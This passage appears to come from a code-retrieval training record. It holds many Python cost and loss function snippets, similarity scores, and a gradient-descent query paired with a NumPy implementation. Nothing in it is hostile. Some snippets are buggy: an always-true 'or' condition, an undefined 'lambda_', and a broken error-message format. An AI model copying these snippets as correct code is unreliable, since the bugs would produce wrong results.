Cost.DICE_SOFT or self.cost_function == Cost.BATCH_DICE_SOFT:\n loss = 1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice, exclude_zero_label=False)\n # Weighted combination of dice and cross entropy\n elif self.cost_function == Cost.DICE_SOFT_CE or self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n loss = self._loss_weight * (1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice,\n exclude_zero_label=False))\n loss += (1.0 - self._loss_weight) * tfu.get_cross_entropy(logits=flat_logits, y=flat_labels,\n n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice log loss (-log(dice_score)). Considered to have nicer gradient.\n # But seems to be not realy more valuable in real life\n elif self.cost_function == Cost.DICE_LOG or self.cost_function == Cost.BATCH_DICE_LOG:\n loss = tfu.get_dice_log_loss(self.logits, self.y, axis=axis, exclude_zero_label=False)\n\n # MSE loss used for regression tasks\n elif self.cost_function == Cost.MSE:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n\n # TV loss (MSE + total variation of output as regularizer). Seems to not work very\n elif self.cost_function == Cost.TV:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n tv = tf.reduce_sum(tf.image.total_variation(self.logits))\n loss += self._tv_regularizer * tv\n else:\n raise ValueError(\"Unknown cost function: \" % self.cost_function.name)\n\n # if value for l1 or l2 regularizer is given add them to the loss\n if self._l2_regularizer is not None:\n self.l2regularizers = self._l2_regularizer * sum(\n [tf.nn.l2_loss(variable) for variable in self.variables])\n loss += self.l2regularizers\n if self._l1_regularizer is not None:\n self.l1regularizers = self._l1_regularizer * sum([\n tf.reduce_sum(tf.abs(variable)) for variable in self.variables])\n loss += self.l1regularizers\n\n return loss", "def fixed_cost(self):\n return np.einsum('i->', self.c[self.f])", "def compute_cost(AL, Y, parameters ,lambd):\n L = len(parameters) // 2\n m = Y.shape[1]\n cost = -1 / m * np.sum(np.nan_to_num(Y * np.log(AL) + (1-Y) * np.log(1-AL)))\n cost+= 0.5*(lambd/m)*sum(np.linalg.norm(parameters['W' + str(i)])**2 for i in range(1,L))\n return cost", "def compute(self, inputs):\n\t\tres = inputs\n\t\tfor layer in range(self.layersNumber):\n\t\t\tweight = self.weights[layer]\n\t\t\tbias = self.biases[layer]\n\t\t\tres = fActivation(np.dot(weight, res) + bias)\n\t\treturn res", "def cost(self, output, labels, weights):\n raise NotImplementedError('Must be overridden by concrete subclass')", "def CostFunction(self, out, V, P, params):\n u = self.u\n p = self.p\n puni = self.puni\n xd = self.xd\n xa = self.xa\n l = self.l\n Lagrange_Tracking = 0\n Lagrange_Regularisation = 0\n\n # input regularization\n for name in set(u.keys()):\n Lagrange_Regularisation += puni['weights',name][0]*ca.mtimes((u[name]-p['ref',name]).T,u[name]-p['ref',name])\n\n Lagrange_Regularisation += puni['weights','AoA']*out['AoA']**2\n Lagrange_Regularisation += puni['weights','sslip']*out['sslip']**2\n\n # --- Initialization tracking\n for name in set(xd.keys())- set(['R','E','Drag']):\n Lagrange_Tracking += puni['weights',name][0]*ca.mtimes((xd[name]-p['ref',name]).T,xd[name]-p['ref',name])\n for k in range(9):\n Lagrange_Tracking += ca.reshape(puni['weights','R'][0]*ca.mtimes((xd['R']-p['ref','R']).T,xd['R']-p['ref','R']),9,1)[k]\n\n\n Lagrange_Tracking = ca.Function('lagrange_track', [xd,xa,u,p,puni,l],[Lagrange_Tracking])\n Lagrange_Regularisation = ca.Function( 'lagrange_reg', [xd,xa,u,p,puni,l],[Lagrange_Regularisation])\n\n\n Tracking = 0\n Regularisation = 0\n\n\n for k in range(self.nk): # V['XA',k,0] is not same time step as V['Xd',k,0] but same result\n ftrack = Lagrange_Tracking(V['Xd',k,0], V['XA',k,0], V['U',k], P['p',k,0],P['puni'], V['l'])\n Tracking += ftrack\n\n freg = Lagrange_Regularisation(V['Xd',k,0], V['XA',k,0], V['U',k], P['p',k,0],P['puni'], V['l'])\n Regularisation += freg\n\n E_final = 10. * V['Xd',-1,-1,'E'] # for maximising final energy\n Tracking_Cost = (1-P['toggle_to_energy']) * Tracking #* 1e-3 # Tracking of initial guess\n Regularisation_Cost = Regularisation # Regularisation of inputs\n Lift_Cost = 0.5*V['vlift']**2 #* 1e2 # Regularisation of inputs\n Energy_Cost = P['toggle_to_energy'] * (E_final/params['sref'])/V['tf']\n SOSCFix = 10. * V['Xd',self.nk/4,0,'q',1]**2\n\n Cost = 0\n Cost = (Tracking_Cost + Regularisation_Cost + Lift_Cost + SOSCFix)/float(self.nk) + Energy_Cost\n\n return Cost", "def cost(TH,X,Y,lda=1):\n m = X.shape[0]\n htx = ff(X,TH)[-1]\n\n termsum = 0\n for rn in range(m):\n termsum += (-1.*Y[rn,:])*(np.log(htx[rn,:]).T) -(1. -Y[rn,:])*(np.log(1. -htx[rn,:]).T)\n termsum = 1./m*(termsum)\n\n regsum = 0\n for th in TH:\n regsum += sum(sum(np.power(th[:,1:],2)))\n regsum = lda/(2.*m)*regsum\n\n return termsum[0,0] +regsum", "def cost_function(params, count):\n circuit = models.Circuit(nqubits)\n for l in range(layers):\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n for q in range(0, nqubits - 1, 2):\n circuit.add(gates.CZ(q, q + 1))\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n for q in range(1, nqubits - 2, 2):\n circuit.add(gates.CZ(q, q + 1))\n circuit.add(gates.CZ(0, nqubits - 1))\n for q in range(nqubits):\n circuit.add(gates.RY(q, theta=0))\n\n cost = 0\n circuit.set_parameters(\n params\n ) # this will change all thetas to the appropriate values\n for i in range(len(ising_groundstates)):\n final_state = circuit(np.copy(ising_groundstates[i]))\n cost += np.real(encoder.expectation(final_state.state()))\n\n if count[0] % 50 == 0:\n print(count[0], cost / len(ising_groundstates))\n count[0] += 1\n\n return cost / len(ising_groundstates)", "def fit(self, X, y):\n X = self.normalize_data(X)\n X = self.add_bias(X)\n n_tasks = len(X)\n n_feats = X[0].shape[1]\n W = np.random.randn(n_feats, n_tasks)\n cost_function = 0\n start = time.time()\n for t in range(n_tasks):\n fista = Fista(self, self.lambda_1)\n w_opt = fista.fit(W[:, t], X[t], y[t], self.groups,\n max_iter=self.max_iter)\n W[:, t] = w_opt\n cost_function += self.cost(X[t], y[t], W[:, t])\n stop = time.time() - start\n self.W = W\n return W, np.array([cost_function]), stop", "def compute_cost(self,X, y):\r\n num_examples = np.shape(X)[0]\r\n z = np.dot(X,self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n \r\n one_hot_y = np.zeros((num_examples,np.max(y)+1))\r\n logloss = np.zeros((num_examples,)) \r\n for i in range(np.shape(X)[0]):\r\n one_hot_y[i,y[i]] = 1\r\n logloss[i] = -np.sum(np.log(softmax_scores[i,:]) * one_hot_y[i,:])\r\n data_loss = np.sum(logloss)\r\n return 1./num_examples * data_loss", "def _learn_using_SGD(self, y, tx, w, batch_size, fn, gamma, lambda_, regularization):\n for y_batch, tx_batch in batch_iter(y, tx, batch_size=batch_size, num_batches=1):\n loss, grad = fn(y_batch, tx_batch, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def running_cost(self, t_span, step_size, x):\n cost = 0\n ones = torch.ones(x.shape[1], 1, device=x.device)\n for idx,t in enumerate(t_span):\n input_nn = torch.cat([ones*t, x[idx,:,:]], 1)\n X_C_X = self.x_M_x(x[idx,:,:], self.C)\n alpha_t = self.func_ode.alpha(input_nn)\n alpha_D_alpha = self.x_M_x(alpha_t, self.D)\n cost += step_size*(X_C_X + alpha_D_alpha)\n return cost", "def adjust_cost(self) -> None:\n\n n_iterations = self.array.shape[-1]\n n_year = len(self.array.year.values)\n\n # If uncertainty is not considered, the cost factor equals 1.\n # Otherwise, a variability of +/-30% is added.\n\n if n_iterations == 1:\n cost_factor = 1\n else:\n if \"reference\" in self.array.value.values.tolist():\n cost_factor = np.ones((n_iterations, 1))\n else:\n cost_factor = np.random.triangular(0.7, 1, 1.3, (n_iterations, 1))\n\n # Correction of hydrogen tank cost, per kg\n # Correction of fuel cell stack cost, per kW\n if \"FCEV\" in self.array.powertrain:\n self.array.loc[\n dict(powertrain=\"FCEV\", parameter=\"fuel tank cost per kg\")\n ] = np.reshape(\n (1.078e58 * np.exp(-6.32e-2 * self.array.year.values) + 3.43e2)\n * cost_factor,\n (1, n_year, n_iterations),\n )\n\n self.array.loc[\n dict(powertrain=\"FCEV\", parameter=\"fuel tank cost per kg\")\n ] = np.reshape(\n (3.15e66 * np.exp(-7.35e-2 * self.array.year.values) + 2.39e1)\n * cost_factor,\n (1, n_year, n_iterations),\n )\n\n # Correction of energy battery system cost, per kWh\n list_batt = [\n i\n for i in [\"BEV\", \"PHEV-e\", \"PHEV-c-p\", \"PHEV-c-d\"]\n if i in self.array.powertrain\n ]\n if len(list_batt) > 0:\n self.array.loc[\n dict(powertrain=list_batt, parameter=\"energy battery cost per kWh\")\n ] = np.reshape(\n (2.75e86 * np.exp(-9.61e-2 * self.array.year.values) + 5.059e1)\n * cost_factor,\n (1, 1, n_year, n_iterations),\n )\n\n # Correction of power battery system cost, per kW\n list_pwt = [\n i\n for i in [\n \"ICEV-p\",\n \"ICEV-d\",\n \"ICEV-g\",\n \"PHEV-c-p\",\n \"PHEV-c-d\",\n \"FCEV\",\n \"HEV-p\",\n \"HEV-d\",\n ]\n if i in self.array.powertrain\n ]\n\n if len(list_pwt) > 0:\n self.array.loc[\n dict(powertrain=list_pwt, parameter=\"power battery cost per kW\")\n ] = np.reshape(\n (8.337e40 * np.exp(-4.49e-2 * self.array.year.values) + 11.17)\n * cost_factor,\n (1, 1, n_year, n_iterations),\n )\n\n # Correction of combustion powertrain cost for ICEV-g\n if \"ICEV-g\" in self.array.powertrain:\n self.array.loc[\n dict(powertrain=\"ICEV-g\", parameter=\"combustion powertrain cost per kW\")\n ] = np.clip(\n np.reshape(\n (5.92e160 * np.exp(-0.1819 * self.array.year.values) + 26.76)\n * cost_factor,\n (1, n_year, n_iterations),\n ),\n None,\n 100,\n )", "def cost(self, output, labels, weights):\n return tf.multiply(0.5 * tf.square(output - labels), weights)", "def evaluate_function(self, trajectory):\n objective_values_by_tag = self.evaluate_function_by_objective(trajectory)\n objective_function_values = 0.\n objective_distance_to_goal = 0.\n objective_function_values_init = 0.\n\n reachability_cost = False\n\n # Judge if we are using reachability cost\n for tag, objective_values in objective_values_by_tag:\n if tag == 'reach_avoid_4d':\n reachability_cost = True\n\n # No freezing cost!\n if reachability_cost:\n for tag, objective_values in objective_values_by_tag:\n if tag == 'reach_avoid_4d' or 'avoid_4d':\n objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n else:\n for tag, objective_values in objective_values_by_tag:\n objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n # ## Freeze the sum of 2 costs, at the minimum of the sum of cost\n # if reachability_cost:\n # for tag, objective_values in objective_values_by_tag:\n # if tag == 'reach_avoid_4d' or 'avoid_4d':\n # objective_function_values += objective_values\n # if tag == 'distance_to_goal':\n # objective_distance_to_goal += objective_values\n # try:\n # ## Freeze_v1, freeze at the minimum cost of sum: reach_avoid + avoid\n # # objective_function_values = self._freeze_cost_v1(objective_function_values, objective_distance_to_goal)\n #\n # # Freeze v2, freeze at the minimum cost of only reach_avoid\n # objective_function_values = self._freeze_cost_v2(objective_values_by_tag, objective_function_values, objective_distance_to_goal)\n # objective_function_values = self._reduce_objective_values(trajectory, objective_function_values)\n # except ValueError:\n # print(\"cannot freeze in total cost\")\n # objective_function_values = self._reduce_objective_values(trajectory, objective_function_values)\n # else:\n # for tag, objective_values in objective_values_by_tag:\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n # ## Freeze the sum of 2 costs, at the minimum of the reach_avoid cost\n # if reachability_cost:\n # for tag, objective_values in objective_values_by_tag:\n # if tag == 'reach_avoid_4d' or 'avoid_4d':\n # objective_function_values = self._freeze_cost_v2(objective_values, objective_distance_to_goal)\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n # else:\n # for tag, objective_values in objective_values_by_tag:\n # objective_function_values += self._reduce_objective_values(trajectory, objective_values)\n\n return objective_function_values", "def calc_cost(self):\n \n correct_pred = tf.equal(self.predictions, tf.argmax(self.y,1))\n batchaccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) \n return self.cost, batchaccuracy, self.predictions", "def cost(self) -> float:", "def compute_cost_gradient2(x, y0, W, V, U, b0, b1, b2):\n # compute cost\n A1 = x @ W + b0\n A2 = x @ V + b1\n z0 = sigmoid(A1)\n z1 = sigmoid(A2)\n z = np.array([z0, z1]).T\n A3 = z @ U + b2\n y = sigmoid(A3)\n if y0 is None:\n return y\n cost = np.sum((y - y0) ** 2)\n # compute gradient\n dy = 2 * (y - y0)\n dA3 = dy * (y * (1 - y))\n dz0 = dA3 * U[0]\n dz1 = dA3 * U[1]\n dA1 = dz0 * (z0 * (1 - z0))\n dA2 = dz1 * (z1 * (1 - z1))\n dW = x.T @ dA1\n dV = x.T @ dA2\n dU = z.T @ dA3\n db0 = np.sum(dA1)\n db1 = np.sum(dA2)\n db2 = np.sum(dA3)\n return cost, dW, dV, dU, db0, db1, db2", "def f_tf(self, t, x, y, z):\n raise NotImplementedError", "def _learn_using_GD(self, y, tx, w, fn, gamma, lambda_, regularization):\n loss, grad = fn(y, tx, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def objective(xs, fps, fns):\n Wp = - np.log(fpr / (1 - fpr)) # Weight for false positives\n Wn = - np.log(fnr / (1 - fnr)) # Weight for false negatives\n Wx = - np.log(f / (1 - f)) # Weight for all positives\n return np.sum(xs) * Wx + np.sum(fps) * Wp + np.sum(fns) * Wn", "def costFunctionReg(theta, X, y, Lambda):\n # Initialize some useful values\n m = len(y) # number of training examples\n j = costFunction(theta, X, y)\n j += (Lambda/(2*m))*np.sum(theta[1:]**2)\n return j", "def compute_thetas(X, A=None, penalty='consensus', shuffle_arcs=False, return_D=False):\n def _col_shuf(arr):\n arr = arr.copy()\n for i in range(arr.shape[1]):\n np.random.shuffle(arr[:, i])\n return arr\n\n def _compute_A():\n A = np.empty((6, 5))\n for i, _ in enumerate(df_main.iterrows()):\n # Loop through columns\n for j in range(5):\n vals = [df.iloc[i, j] for df in dfs]\n A[i, j] = np.median(vals)\n\n if shuffle_arcs:\n return _col_shuf(A)\n\n return A\n\n def _compute_W():\n \"\"\"Get weight array W.\"\"\"\n if penalty == \"consensus\":\n W = 1.0 * np.array(\n [[0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 0, 0],\n [1, 1, 1, 1, 0],\n [0, 0, 1, 0, 0]]\n )\n elif penalty in ['var', 'std']:\n W = np.empty((6, 5))\n for i, _ in enumerate(df_main.iterrows()):\n for j in range(5):\n vals = [df.iloc[i, j] for df in dfs]\n W[i, j] = np.std(vals)\n\n if penalty == 'var':\n W = W ** 2\n W = 1 / W\n else:\n W = np.ones((6, 5))\n\n return W / W.sum(axis=1).reshape((-1, 1))\n\n def _dist(x, a, w):\n \"\"\"Compute the WED between vector x from X and vector a from A.\n \"\"\"\n m_xa = 0\n for k in range(len(x)):\n m_xa += (x[k] - a[k])**2 * w[k]\n return m_xa\n\n if A is None: # Then build A from Big Five data\n if X.shape[1] != 5:\n raise TypeError('Datapoints needs to have 5 columns.')\n\n df_main = pd.read_csv('build_dataset/data/archetypes.csv')\n\n dfs = [\n df_main.iloc[:, range(0, 5)],\n df_main.iloc[:, range(5, 10)],\n df_main.iloc[:, range(10, 15)]\n ]\n\n A = _compute_A()\n W = _compute_W()\n\n elif X.shape[1] != A.shape[1]:\n raise TypeError('Datapoints and archetypes have different dimensions.')\n else:\n W = np.ones(A.shape)\n W = W / W.sum(axis=1).reshape((-1, 1))\n\n rows, cols = X.shape[0], A.shape[0]\n D = np.zeros((rows, cols))\n\n for i in range(rows):\n x = X[i, :]\n for j in range(cols):\n a = A[j, :]\n w = W[j, :]\n D[i, j] = _dist(x, a, w)\n \n if return_D:\n return D\n\n M = np.max(D, axis=1).reshape((-1, 1)) - D\n return M * 1.0 / np.sum(M, axis=1).reshape((-1, 1))", "def cost(lossvalues):\n return np.sum(lossvalues ** 2) / (2 * lossvalues.shape[1])", "def lrCostFunction(theta, X, y, lambda_):\n if X.ndim == 1:\n X = X.reshape(1, -1)\n\n if y.dtype == bool:\n y = y.astype(int)\n\n # Initialize some useful values\n m = len(y) # number of training examples\n\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the cost of a particular choice of theta.\n # You should set J to the cost.\n #\n # Hint: The computation of the cost function and gradients can be\n # efficiently vectorized. For example, consider the computation\n #\n # sigmoid(X * theta)\n #\n # Each row of the resulting matrix will contain the value of the\n # prediction for that example. You can make use of this to vectorize\n # the cost function and gradient computations.\n #\n\n z = X @ theta\n h = sigmoid(z)\n\n theta_ = np.r_[0, theta[1:]]\n\n J = (-y @ np.log(h) - (1 - y) @ np.log(1 - h)) / m\n J += lambda_ * sum(theta_**2) / (2 * m)\n\n grad = (h - y) @ X / m\n grad += lambda_ * theta_ / m\n\n # =============================================================\n\n return J, grad", "def Cost(self, input_data: list, target_output_data: list):\n error = 0\n for input_, target_output in zip(input_data, target_output_data):\n generated_output = self.Evaluate(input_)\n for target_output_value, generated_output_value in zip(target_output, generated_output):\n error += (target_output_value - generated_output_value) ** 2\n return error / (2 * len(input_data))", "def compute_cost_derivative(AL, Y):\n pass", "def costFunction(R, W):\n costFunc = 0\n for i in range(0, len(R)):\n for j in range(i, len(R)):\n costFunc += costBetweenNodes(R, W, i, j)\n return costFunc", "def costFunction(theta, X, y):\n\n # Initialize some useful values\n m = y.size # number of training examples\n J = np.sum(np.array([inner(theta, xi, yi) for xi, yi in zip(X, y)]))\n J /= m\n\n\n return J", "def cost(predictions, targets):\n # averages the error across all data points, taking the values that have not been rounded to 0 and 1.\n return np.mean( (predictions - targets)**2)", "def compute_cost(X, y, theta, lambd):\n assert(theta.shape[0] == X.shape[1])\n \n m = X.shape[0]\n grad = np.zeros(y.shape)\n J = 0\n \n output = sigmoid(np.dot(X, theta))\n\n J = np.sum(- y * np.log(output) - (1 - y) * np.log(1 - output)) / m + lambd / (2 * m) * np.sum(np.square(theta[1:]))\n\n grad = np.dot(X.T, (output - y)) / m\n \n grad[1:] = grad[1:] + lambd / m * theta[1:]\n\n return J, grad", "def cost(self, data_X, data_Y):\n c = self.cost_function(data_Y, self.predict(data_X))\n\n if self.regularizer is not None:\n c += self.regularizer.cost(self.particle_input, self.layers)\n\n return c", "def compute_cost_and_grad_with_reg(theta, X, y, lambda_):\n m = X.shape[0]\n y_hat = sigmoid(X @ theta.T)\n J = - (1 / m) * np.sum(y * np.log(y_hat) + (1 - y) * np.log(1 - y_hat)) + np.sum(lambda_ / (2 * m) * theta[1:] ** 2)\n temp = theta\n temp[0] = 0\n grad = (1 / m) * X.T @ (y_hat - y) + lambda_ / m * temp\n return J, grad", "def cost_function (model, X, y, lambda_reg=0.):\n\n m = len (y)\n pred = model.predict (X)\n cost = 1. / (2. * m) * ((pred - y)**2).sum () + \\\n lambda_reg / (2. * m) * (model.coef_**2).sum ()\n return (cost)", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def compile(self):\n\n target_values = T.fmatrix('target_values')\n\n train_output = lasagne.layers.get_output(self.l_out)\n\n pred_output = lasagne.layers.get_output(self.l_out, deterministic=True)\n\n reg = lasagne.regularization.regularize_layer_params(self.l_out, lasagne.regularization.l2)\n\n train_cost = self.cost_function(train_output,target_values).mean() + reg * 0.01\n \n real_cost = self.cost_function(pred_output, target_values).mean() + reg * 0.01\n\n # Retrieve all parameters from the network\n all_params = lasagne.layers.get_all_params(self.l_out,trainable=True)\n\n self.logger.info(\"Computing updates...\")\n updates = self.update_function(train_cost, all_params, LEARNING_RATE)\n\n \n self.logger.info(\"Compiling functions ...\")\n\n # compile Theano GPU functions for training and computing train_cost\n self._train = theano.function([self.in_layer.input_var, self.i_mask.input_var, target_values], train_cost, \n updates=updates, allow_input_downcast=True)\n\n self._compute_cost = theano.function([self.in_layer.input_var, self.i_mask.input_var, target_values], real_cost, \n allow_input_downcast=True)\n\n self.label = theano.function([self.in_layer.input_var, self.i_mask.input_var],pred_output,allow_input_downcast=True)\n \n self._compiled = True", "def computing(self, inputList):\n\t\tr = 0\t# The sum variable\n\n\t\t# Summation and Threshold function(Activate function)\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tr += (int)(inputList[i]) * self.weight[i]\n\t\t\tif debugMode == True:\n\t\t\t\tprint \"\"\n\t\t\t\tprint \"input: \", inputList[i], \"weight: \", self.weight[i]\n\t\t\t\tprint \"sum: \", r\n\t\tif r > self.theta:\n\t\t\treturn 1.0\n\t\telse:\n\t\t\treturn -1.0;", "def __call__(self, x, u, k):\n first_time_through = True\n for cost, arg, weight in zip(self._costs, self._args, self._weights):\n if arg == \"x\":\n cost_input = x\n else:\n cost_input = u[arg]\n\n current_term = weight * cost(cost_input, k)\n if current_term > 1e8:\n print(\"Warning: cost %s is %f\" % (cost._name, current_term))\n print(\"Input is: \", cost_input)\n\n# if cost._name[:4] == \"bike\":\n# print(cost._name, \": \", current_term)\n\n if first_time_through:\n total_cost = current_term\n else:\n total_cost += current_term\n\n first_time_through = False\n\n return total_cost", "def costFunction(self, x, y ):\n self.yEst = self.forward_propagate(x)\n sqErrors = ( self.yEst - y ) ** 2\n J = sqErrors.sum() / 2\n return J", "def calc_optimal_target_permutation(feats: np.ndarray, targets: np.ndarray) -> np.ndarray:\n # Compute cost matrix\n cost_matrix = np.zeros([feats.shape[0], targets.shape[0]])\n # calc SSE between all features and targets\n for i in range(feats.shape[0]):\n cost_matrix[:, i] = np.sum(np.square(feats-targets[i, :]), axis=1)\n \n _, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n # Permute the targets based on hungarian algorithm optimisation\n targets[range(feats.shape[0])] = targets[col_ind]\n return targets", "def calc_cost(y, x, theta_1, theta_0):\n h = theta_1 * x + theta_0\n d = h - y\n cost = np.dot(d.T, d) / (2*x.shape[0])\n return cost.flat[0]", "def oneVsAll(X, y, num_labels, Lambda):\n\n# Some useful variables\n m, n = X.shape\n\n# You need to return the following variables correctly \n all_theta = [None] * num_labels\n\n# Add ones to the X data matrix\n X = np.column_stack((np.ones((m, 1)), X))\n\n# ====================== YOUR CODE HERE ======================\n# Instructions: You should complete the following code to train num_labels\n# logistic regression classifiers with regularization\n# parameter lambda. \n#\n# Hint: theta(:) will return a column vector.\n#\n# Hint: You can use y == c to obtain a vector of 1's and 0's that tell use \n# whether the ground truth is true/false for this class.\n#\n# Note: For this assignment, we recommend using fmincg to optimize the cost\n# function. It is okay to use a for-loop (for c = 1:num_labels) to\n# loop over the different classes.\n\n # Set Initial theta\n initial_theta = np.zeros((n + 1, 1))\n\n # This function will return theta and the cost\n for digit in range(num_labels):\n print('digit:', digit)\n result = scipy.optimize.minimize(lambda t: cost(X, y==digit, t, lambda_),\n initial_theta,\n jac=lambda t: gradient(X, y==digit, t, lambda_),\n method='L-BFGS-B')\n theta = result.x\n all_theta[digit] = theta\n\n\n# =========================================================================\n\n return all_theta", "def compute(self, inputs, outputs):\n\n # Add new variables to dictionnary\n cpacs = CPACS(Rt.modules[-1].cpacs_out)\n\n update_dict(cpacs.tixi, Rt.optim_var_dict)\n\n # Save the whole aeromap if needed\n if Rt.use_aeromap:\n update_am_dict(cpacs, Rt.aeromap_uid, Rt.am_dict)\n\n for obj in Rt.objective:\n var_list = split(\"[+*/-]\", obj)\n for v in var_list:\n if not v.isdigit() and v != \"\":\n exec('{} = inputs[\"{}\"]'.format(v, v))\n result = eval(obj)\n\n if Rt.minmax == \"min\":\n outputs[\"Objective function \" + obj] = result\n else:\n outputs[\"Objective function \" + obj] = -result", "def _make_train(self):\n with context.context(training=True):\n prediction = self(*self.inputs)\n thecost = self.cost(self.target, prediction)\n return theano.function(self.inputs + [self.target], \n thecost, \n updates=self.updater.get_updates(self.params(), thecost))", "def cost_function(data_x, data_y, parameters):\n # Residual sum of squares\n rss = np.sum((data_x @ parameters - data_y) ** 2)\n\n # Number of rows times 2\n nb_rows_x2 = 2 * data_x.shape[0]\n\n return rss / nb_rows_x2", "def compute_cost_fake(df):\n\timport numpy as np\n\timport cPickle\n\tfrom nn import nn_param\n\tfrom matplotlib import pyplot as plt\n\tfrom theano import tensor as T\n\tf=file(\"nnparams.sav\")\n\tupdate=cPickle.load(f)\n\tsig=np.asarray(df.l0)\n\tsig_noise=np.asarray(df.l0+df.noise)\n\tsig/=np.max(sig)\n\tsig_noise/=np.max(sig_noise)\n\tyval=nn_param(update,sig_noise)\n\treturn T.mean(squared_error(yval,sig))", "def calculateCost(self,sol,weights):\n\t\treturn sum([x.value*y if x != None else 0 \\\n\t\t\t\t\tfor x,y in zip(sol,weights)])" ]
[ "0.72324276", "0.7181755", "0.71723294", "0.69701", "0.69247854", "0.6471834", "0.6227543", "0.6182345", "0.617613", "0.6167203", "0.6144014", "0.6132684", "0.61300564", "0.6123157", "0.6107986", "0.6094501", "0.60778195", "0.6051131", "0.60425967", "0.60174876", "0.60173744", "0.59889996", "0.59743243", "0.59706753", "0.5959947", "0.59376675", "0.5933045", "0.59320205", "0.5924735", "0.5899899", "0.58993536", "0.5872297", "0.5863159", "0.5842421", "0.58324975", "0.58282", "0.5826795", "0.5821148", "0.58185786", "0.58044344", "0.5790787", "0.5772723", "0.5771345", "0.57520807", "0.5725595", "0.5725311", "0.5708302", "0.5706147", "0.5685726", "0.56686896", "0.56516206", "0.5634193", "0.563408", "0.5623906", "0.56227475", "0.5615299", "0.56079394", "0.5605532", "0.55939", "0.5593715", "0.5593547", "0.5580316", "0.55745476", "0.5566441", "0.55659896", "0.55624217", "0.5562287", "0.5544781", "0.5538518", "0.5537638", "0.5525659", "0.55218136", "0.55101", "0.5509815", "0.55006045", "0.54982764", "0.5491615", "0.5480157", "0.54776895", "0.5463443", "0.5460312", "0.5456778", "0.5453202", "0.54526037", "0.54391277", "0.5437517", "0.5430451", "0.54242855", "0.5424001", "0.5399902", "0.53981495", "0.5397562", "0.53935117", "0.5392931", "0.5391276", "0.53875965", "0.53855395", "0.53842384", "0.5383147", "0.5380583" ]
0.74634284
0
Perform gradient descent given a data set with an arbitrary number of features.
def gradient_descent(features, values, theta, alpha, num_iterations): m = len(values) cost_history = [] for i in range(num_iterations): # your code here cost = compute_cost(features, values, theta)/(2.0*m) cost_history.append([cost]) error = features.dot(theta) - values error = np.reshape(error,(error.shape[0], 1)) errorWeighted = features*error errorSum = (np.sum(errorWeighted,0))/(m*1.0) theta = theta - alpha*errorSum return theta, pandas.Series(cost_history)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gradient_descent(features, labels, alpha, num_iters):\n # Initial settings of weights\n weights = [0, 0, 0]\n\n # Length of dataset\n N = len(features[0])\n\n # Take 100 gradient steps\n gradient_losses = [0, 0, 0]\n\n # Take num_iters steps of gradient descent\n for step in range(num_iters):\n\n # For reach data point, compute the gradients w.r.t. weights and offset\n for x1, x2, y in zip(features[0], features[1], labels):\n\n # Create \"expanded feature dimension for x to account for offset\n x = [1, x1, x2]\n\n # Make prediction\n pred = weights[0]*x[0] + weights[1]*x[1] + weights[2]*x[2]\n\n # Compute gradient of loss for linear regression\n for j in range(len(gradient_losses)):\n gradient_losses[j] += (pred-y) * x[j]\n\n # Update weights using gradients above\n for j in range(len(gradient_losses)):\n weights[j] -= (alpha/N) * gradient_losses[j]\n\n # Reset gradients of loss after each step\n gradient_losses = [0, 0, 0]\n\n # Return the weights\n return [weights[0], weights[1], weights[2]]", "def train_gradient_descent(self, X, y, learning_rate=0.01, n_iters=100):\r\n # Step 0: Initialize the parameters\r\n n_samples, n_features = X.shape\r\n self.weights = np.zeros(shape=(n_features,1))\r\n self.bias = 0\r\n costs = []\r\n\r\n for i in range(n_iters):\r\n # Step 1: Compute a linear combination of the input features and weights\r\n y_predict = np.dot(X, self.weights) + self.bias\r\n\r\n # Step 2: Compute cost over training set\r\n cost = (1 / n_samples) * np.sum((y_predict - y)**2)\r\n costs.append(cost)\r\n\r\n if i % 100 == 0:\r\n print(f\"Cost at iteration {i}: {cost}\")\r\n\r\n # Step 3: Compute the gradients\r\n dJ_dw = (2 / n_samples) * np.dot(X.T, (y_predict - y))\r\n dJ_db = (2 / n_samples) * np.sum((y_predict - y)) \r\n \r\n # Step 4: Update the parameters\r\n self.weights = self.weights - learning_rate * dJ_dw\r\n self.bias = self.bias - learning_rate * dJ_db\r\n\r\n return self.weights, self.bias, costs", "def run_gradient_descent(data,theta,alpha,num_iters):\n population = data[:,0]\n prices 